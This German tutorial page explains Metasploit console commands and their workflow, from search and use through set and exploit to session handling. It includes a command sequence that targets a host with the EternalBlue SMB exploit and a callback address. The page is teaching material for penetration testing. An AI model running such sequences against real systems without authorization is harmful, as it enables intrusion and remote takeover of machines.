💰 20% Provision sichern: Verdiene mit unserem Partnerprogramm bei jeder Empfehlung – Jetzt Affiliate werden
Menü

Login Registrieren
Matrix Background
Recht und Legalität

Metasploit Befehle: Die wichtigsten Commands, Syntax und Praxis einfach erklärt

Metasploit Befehle richtig verstehen: Warum ein Command erst im Workflow seinen echten Wert bekommt

Wer nach Metasploit Befehle sucht, möchte meist nicht nur eine trockene Liste von Kommandos sehen, sondern verstehen, welcher Befehl in welcher Situation sinnvoll ist. Genau an diesem Punkt trennt sich ein echtes Fach-Tutorial von einer simplen Cheatsheet-Seite. Metasploit ist kein Werkzeug, das man nachhaltig über einzelne isolierte Befehle lernt. Wirklich nützlich wird es erst dann, wenn Commands in einen klaren Ablauf eingeordnet werden: Konsole starten, Module finden, Optionen lesen, Ziele setzen, Module ausführen, Sessions verwalten und Ergebnisse sauber interpretieren.

Viele Einsteiger kennen schnell Kommandos wie search, use, show options oder set, verstehen aber noch nicht, wie diese Befehle miteinander zusammenhängen. Genau deshalb ist eine gute Command-Seite so wichtig. Sie zeigt nicht nur Syntax, sondern die Denkweise hinter der Console: Metasploit ist ein Framework mit klaren Zuständen, nicht nur eine Kommandozeile mit losen Einzelbefehlen.

Diese Seite ist deshalb als strukturierte Übersichtsseite aufgebaut. Du bekommst hier die wichtigsten Befehle der msfconsole, Hinweise zur Bedienlogik, typische Workflows und die saubersten Anschlussseiten für Vertiefungen rund um Exploits, Auxiliary-Module, Payloads, Meterpreter, Sessions und Gesamtprozesse innerhalb von Metasploit.

Wenn du einzelne Bereiche danach gezielt vertiefen willst, passen Metasploit Tutorial, Metasploit Workflow, Metasploit Exploits, Metasploit Payloads, Metasploit Meterpreter und Metasploit Cheatsheet besonders gut dazu.

Metasploit starten: Der erste Befehl ist fast immer msfconsole

Der wichtigste Einstiegspunkt in Metasploit ist die msfconsole. Sie ist die zentrale Arbeitsumgebung des Frameworks. Von hier aus werden Module gesucht, geladen, konfiguriert und ausgeführt. Genau deshalb ist der erste relevante Befehl fast immer:

msfconsole

Mit diesem Start öffnest du nicht einfach nur ein Tool, sondern eine vollständige Console-Umgebung mit eigenem Befehlsmodell. Alle späteren Commands bauen auf diesem Zustand auf. Wer Metasploit sinnvoll nutzen will, sollte deshalb früh verstehen, dass die Console nicht nur eine Hülle ist, sondern das eigentliche Kontrollzentrum des Frameworks.

Gerade für Einsteiger ist es hilfreich, nach dem Start nicht sofort blind Module zu laden, sondern sich zunächst in der Umgebung zu orientieren. Welche Befehle sind global verfügbar? Wie verändert sich der Kontext nach dem Laden eines Moduls? Welche Informationen zeigt die Console standardmäßig an? Genau aus dieser Orientierung entsteht später Geschwindigkeit.

Wenn du den Einstieg in Metasploit systematisch lernen willst, ist Metasploit Tutorial die passende Ergänzung.

Module finden: search als zentrale Navigationsfunktion

Einer der wichtigsten Befehle in Metasploit ist search. Damit suchst du nach Modulen innerhalb des Frameworks. Da Metasploit eine große Zahl von Exploit-, Auxiliary-, Post- und Payload-bezogenen Komponenten enthält, ist die Suche oft der erste praktische Schritt innerhalb eines konkreten Workflows.

search smb
search type:exploit apache
search type:auxiliary ftp

Dieser Befehl ist deshalb so wichtig, weil er nicht nur Ergebnisse liefert, sondern die eigentliche Navigation im Framework ermöglicht. Metasploit wird nicht linear genutzt. Stattdessen bewegt man sich von einem Thema, Dienst oder Zieltyp aus zu passenden Modulen. search ist dafür das wichtigste Eingangstor.

Besonders nützlich ist die Suche, wenn:

  • ein Protokoll oder Dienst bereits bekannt ist
  • nach einem bestimmten Modultyp gesucht werden soll
  • ein Produkt, Dienstname oder Schwachstellenkontext als Ausgangspunkt dient
  • vor der eigentlichen Nutzung erst einmal passende Optionen verglichen werden sollen

Wer Metasploit produktiv nutzt, verwendet search ständig. Genau deshalb gehört dieser Befehl zu den absoluten Grundlagen.

Für die Einordnung verschiedener Modultypen ist auch Auxiliary Module eine starke Anschlussseite.

Module laden: use als Übergang vom Suchergebnis in den aktiven Arbeitskontext

Sobald ein passendes Modul identifiziert wurde, folgt mit use der Wechsel in den aktiven Modulkontext. Dieser Befehl ist zentral, weil ab diesem Moment nicht mehr nur global in der Console gearbeitet wird, sondern innerhalb eines konkreten Moduls.

use exploit/windows/smb/ms17_010_eternalblue
use auxiliary/scanner/smb/smb_version

Mit use verändert sich der Arbeitszustand der Console. Genau das ist wichtig: Viele nachfolgende Befehle wie show options, set oder run beziehen sich dann auf das aktuell geladene Modul. Wer diesen Zustandswechsel nicht versteht, empfindet Metasploit schnell als unübersichtlich. Wer ihn verstanden hat, erkennt die innere Logik des Frameworks deutlich klarer.

Genau deshalb ist use mehr als nur ein Ladebefehl. Es ist der Übergang von der allgemeinen Navigation in den konkreten Arbeitsmodus.

Für die Unterschiede zwischen Modultypen helfen Metasploit Exploits und Auxiliary Module direkt weiter.

Optionen lesen: show options, show payloads und ähnliche Übersichtsbefehle

Sobald ein Modul geladen wurde, gehört show options zu den wichtigsten nächsten Schritten. Dieser Befehl zeigt, welche Parameter für das Modul relevant sind, welche Pflichtfelder gesetzt werden müssen und welche Werte bereits vorbelegt sind.

show options

Je nach Modultyp kommen weitere Übersichtsbefehle hinzu:

show payloads
show targets
show advanced

Diese Befehle sind deshalb so wertvoll, weil sie die Arbeitsfläche des geladenen Moduls transparent machen. Ohne sie bleibt oft unklar:

  • welche Zielparameter erforderlich sind
  • welche Payloads kompatibel sind
  • ob es Zielvarianten oder erweiterte Optionen gibt
  • welche Konfiguration vor dem Start noch fehlt

Gerade Einsteiger machen häufig den Fehler, zu früh auf run oder exploit zu springen. Sauberer ist fast immer, zuerst mit show options und den verwandten Befehlen die Struktur des Moduls vollständig zu lesen. Genau dadurch wird die spätere Ausführung deutlich kontrollierter.

Wenn du Payload-Zusammenhänge tiefer verstehen willst, ist Metasploit Payloads die passende Vertiefung.

Werte setzen: set, unset und setg für Modul- und Global-Konfiguration

Sobald klar ist, welche Optionen ein Modul benötigt, folgt die Konfiguration über set. Das ist einer der am häufigsten genutzten Befehle in der gesamten Console. Mit ihm werden Zielparameter, lokale Werte oder andere modulabhängige Einstellungen gesetzt.

set RHOSTS 192.168.1.10
set RPORT 445
set LHOST 192.168.1.20

Zum Entfernen eines gesetzten Werts dient:

unset RHOSTS

Für globale Werte, die modulübergreifend gelten sollen, wird häufig setg verwendet:

setg LHOST 192.168.1.20

Diese Befehle sind deshalb so zentral, weil sie den eigentlichen Arbeitszustand eines Moduls definieren. Gerade in größeren Workflows mit mehreren Modulen spart ein sauberer Umgang mit set und setg viel Zeit. Gleichzeitig erfordern globale Werte Disziplin, weil sie spätere Läufe beeinflussen können, ohne dass dies immer sofort sichtbar ist.

Wer Metasploit kontrolliert nutzen will, sollte deshalb immer im Blick behalten, welche Werte lokal und welche global aktiv sind. Genau diese Transparenz verhindert viele typische Fehlkonfigurationen.

Module ausführen: run und exploit im richtigen Kontext einsetzen

Sobald Modul, Optionen und Zielparameter sauber gesetzt sind, folgt die eigentliche Ausführung. Dafür sind in der Praxis vor allem zwei Befehle relevant: run und exploit.

run
exploit

Der funktionale Unterschied wird häufig überbewertet, wichtiger ist zunächst der Kontext:

  • run wird häufig bei Scannern, Auxiliary-Modulen und allgemeinen Modulen verwendet
  • exploit wird meist im Umfeld klassischer Exploit-Module genutzt

Entscheidend ist, dass die Ausführung nicht als isolierter Klick verstanden wird, sondern als Endpunkt eines vorbereiteten Zustands. Ein sauberer Metasploit-Lauf besteht nicht daraus, möglichst schnell exploit zu tippen, sondern erst dann auszuführen, wenn Ziel, Optionen, Payload und Modulrolle klar verstanden sind.

Gerade hier zeigt sich der Unterschied zwischen hektischer Tool-Nutzung und strukturiertem Arbeiten. Gute Ergebnisse beginnen fast immer mit guter Vorbereitung.

Für den Exploit-Kontext ist Metasploit Exploits die wichtigste Anschlussseite.

Sessions verwalten: sessions als Schlüsselbefehl nach erfolgreicher Interaktion

Sobald ein Modul zu einer interaktiven Verbindung oder Session geführt hat, wird sessions zu einem der wichtigsten Befehle der Console. Damit lassen sich bestehende Sessions auflisten, anwählen und verwalten.

sessions
sessions -i 1

Gerade in Workflows mit mehreren Targets oder mehreren parallelen Sitzungen ist dieser Befehl unverzichtbar. Er schafft Übersicht darüber:

  • welche Sessions aktuell existieren
  • welcher Session-Typ vorliegt
  • mit welcher Session weitergearbeitet werden soll

Die Fähigkeit, Sessions sauber zu lesen und gezielt zu übernehmen, ist einer der wichtigsten praktischen Schritte im Metasploit-Alltag. Genau hier wird aus einer erfolgreichen Ausführung ein kontrollierter Arbeitsprozess.

Für diesen Bereich sind Metasploit Meterpreter und Post Exploitation die zentralen Vertiefungen.

Hilfe, Informationen und Kontext: help, info und back sinnvoll nutzen

Neben Suche, Nutzung und Ausführung gibt es einige Console-Befehle, die im Alltag enorm hilfreich sind, weil sie Orientierung und Kontext schaffen. Dazu gehören vor allem help, info und back.

help
info
back

Ihre Rolle ist klar:

  • help zeigt verfügbare Befehle oder Hilfeinformationen
  • info liefert nähere Details zum aktuell geladenen Modul
  • back verlässt den Modulkontext und kehrt zur allgemeinen Console zurück

Gerade info wird von vielen unterschätzt. Dieser Befehl ist wichtig, weil er das Modul nicht nur technisch, sondern auch inhaltlich einordnet. Was ist sein Zweck? Welche Zielumgebung ist gemeint? Welche Einschränkungen oder Hinweise sind relevant? Genau solche Informationen helfen dabei, Module nicht nur auszuführen, sondern bewusst zu verstehen.

back wiederum ist im Workflow fast genauso wichtig, weil Metasploit stark zustandsbasiert arbeitet. Wer nicht sauber zwischen globalem Console-Zustand und Modulkontext unterscheiden kann, verliert schnell den Überblick.

Typische Workflow-Kette mit den wichtigsten Metasploit Befehlen

Ein sauberer Metasploit-Ablauf besteht in der Praxis selten aus nur einem Command. Viel häufiger ergibt sich eine wiederkehrende Kette von Befehlen, die den Workflow logisch strukturieren.

msfconsole
search smb
use auxiliary/scanner/smb/smb_version
show options
set RHOSTS 192.168.1.10
run
back
search eternalblue
use exploit/windows/smb/ms17_010_eternalblue
show options
show payloads
set RHOSTS 192.168.1.10
set LHOST 192.168.1.20
exploit
sessions

Diese Kette macht die innere Logik des Frameworks sichtbar:

  • zuerst Überblick gewinnen
  • dann passendes Modul finden
  • danach Optionen verstehen
  • Zielparameter setzen
  • Modul kontrolliert ausführen
  • später Sessions verwalten

Genau solche Abfolgen sind der eigentliche Kern einer guten Command-Seite. Nicht die isolierte Syntax ist entscheidend, sondern die Reihenfolge, in der Befehle innerhalb eines technischen Prozesses sinnvoll werden.

Für komplette Prozesslogik ist Metasploit Workflow die stärkste Anschlussseite.

Typische Fehler bei Metasploit Befehlen

Viele Probleme mit Metasploit entstehen nicht durch fehlende Kommandos, sondern durch deren falsche Einordnung im Ablauf. Genau deshalb ist es wichtig, typische Fehlerbilder früh zu verstehen.

  • zu früh ein Modul ausführen, ohne show options gelesen zu haben
  • Payloads wählen, ohne Kompatibilität oder Zielkontext zu prüfen
  • globale Werte mit setg setzen und später deren Einfluss übersehen
  • im falschen Modulkontext arbeiten
  • Suchergebnisse laden, ohne das Modul mit info fachlich einzuordnen
  • Sessions erzeugen, aber nicht sauber verwalten

Gerade Einsteiger neigen dazu, Metasploit als lineare Klickfolge zu sehen: suchen, laden, exploit. In Wirklichkeit ist das Framework viel stärker zustands- und kontextbezogen. Wer diesen Punkt übersieht, empfindet viele Befehle als unübersichtlich. Wer ihn verstanden hat, erkennt ein sehr konsistentes Bedienmodell.

Genau deshalb ist der Schlüssel nicht, mehr Kommandos auswendig zu lernen, sondern die vorhandenen Befehle in ihrem richtigen technischen Zusammenhang zu verstehen.

Für Fehlersituationen und saubere Einordnung helfen Metasploit Workflow und Metasploit Beispiele besonders gut weiter.

Deep Dive: Metasploit Befehle zeigen, dass das Framework eher wie ein Arbeitsraum als wie ein einzelnes Tool funktioniert

Der eigentliche Wert einer guten Metasploit-Befehlsübersicht liegt darin, dass sie die Natur des Frameworks sichtbar macht. Metasploit funktioniert nicht wie ein Einmal-Command mit festem Input und festem Output. Es funktioniert eher wie ein Arbeitsraum mit Zuständen, Rollen und Übergängen. Genau deshalb sind seine Befehle so eng miteinander verknüpft.

Ein Command wie search ist Navigation. use verändert den Arbeitszustand. show options öffnet die konkrete Arbeitsfläche eines Moduls. set definiert den technischen Kontext. run oder exploit lösen den vorbereiteten Schritt aus. sessions übernimmt danach die Verwaltung von Resultaten. Genau diese Kette macht Metasploit verständlich.

Wer diese Struktur verinnerlicht, lernt nicht nur Befehle, sondern die innere Logik des Frameworks. Genau das ist der Unterschied zwischen oberflächlicher Command-Kenntnis und belastbarem Praxiswissen. Nicht die Menge der Kommandos entscheidet, sondern das Verständnis ihres Zusammenspiels.

Gerade deshalb ist eine gute Command-Seite nicht einfach eine Liste. Sie ist eine Landkarte durch das Arbeitsmodell von Metasploit. Wer sich in dieser Landkarte orientieren kann, arbeitet wesentlich kontrollierter, schneller und fachlich sauberer.

Wenn du diesen Blick weiter vertiefen willst, helfen Wie funktioniert Metasploit, Metasploit Workflow, Metasploit Cheatsheet und Metasploit vs Manual besonders gut weiter.

Fazit: Metasploit Befehle heißt nicht nur Syntax kennen, sondern Console-Zustände, Modulkontexte und Abläufe sauber verstehen

Metasploit Befehle sind nur dann wirklich nützlich, wenn sie nicht isoliert gelernt, sondern in einem klaren Workflow verstanden werden. Vom Start der msfconsole über Suche, Modulauswahl, Optionsprüfung und Konfiguration bis hin zu Ausführung und Session-Verwaltung folgt das Framework einer sehr klaren inneren Logik.

Wer diese Logik beherrscht, arbeitet mit Metasploit deutlich kontrollierter. Commands wie search, use, show options, set, run, exploit und sessions sind nicht nur Einzelbefehle, sondern Bausteine eines strukturierten Analyse- und Exploit-Prozesses. Genau daraus entsteht saubere Praxis.

Nicht die längste Befehlsliste bringt den größten Mehrwert, sondern das Verständnis dafür, wann welcher Command in welchem Zustand des Frameworks sinnvoll wird. Genau dort beginnt belastbares Arbeiten mit Metasploit.

Wenn du an den wichtigsten Vertiefungen weiterarbeiten willst, führen Metasploit Tutorial, Metasploit Workflow, Metasploit Exploits, Metasploit Payloads, Metasploit Meterpreter und Metasploit Cheatsheet direkt in die wichtigsten nächsten Themen.


Passende Vertiefungen, Vergleiche und Spezialthemen:

Passender Lernpfad:

Passende Erweiterungen:

Passende Lernbundels:

Passende Zertifikate: